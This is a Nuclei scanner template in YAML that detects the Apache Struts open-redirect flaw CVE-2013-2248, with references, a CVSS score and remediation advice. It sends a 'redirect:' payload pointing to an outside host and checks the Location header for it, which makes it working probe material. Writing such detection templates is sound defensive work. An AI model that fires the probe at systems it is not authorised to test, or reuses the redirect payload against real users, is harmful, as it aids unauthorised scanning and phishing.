39 lines
1.5 KiB
YAML
39 lines
1.5 KiB
YAML
id: CVE-2013-2248
|
|
|
|
info:
|
|
name: Apache Struts - Multiple Open Redirection Vulnerabilities
|
|
author: 0x_Akoko
|
|
severity: medium
|
|
description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
|
|
remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/38666
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2013-2248
|
|
- https://cwiki.apache.org/confluence/display/WW/S2-017
|
|
- http://struts.apache.org/release/2.3.x/docs/s2-017.html
|
|
- http://www.fujitsu.com/global/support/software/security/products-f/interstage-bpm-analytics-201301e.html
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N
|
|
cvss-score: 5.8
|
|
cve-id: CVE-2013-2248
|
|
cwe-id: CWE-20
|
|
epss-score: 0.97289
|
|
epss-percentile: 0.99836
|
|
cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: apache
|
|
product: struts
|
|
tags: cve,cve2013,apache,redirect,struts,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.action?redirect:http://www.interact.sh/"
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: header
|
|
regex:
|
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
|
# digest: 4a0a00473045022100c49c2a53664ed380e34343a32491c941bab6daec85ad1803613fbf7a27a5962202200a9907ca4427d43b814da0061058cae0458b273ee649c5cff43d300f828cda6c:922c64590222798bb761d5b6d8e72950 |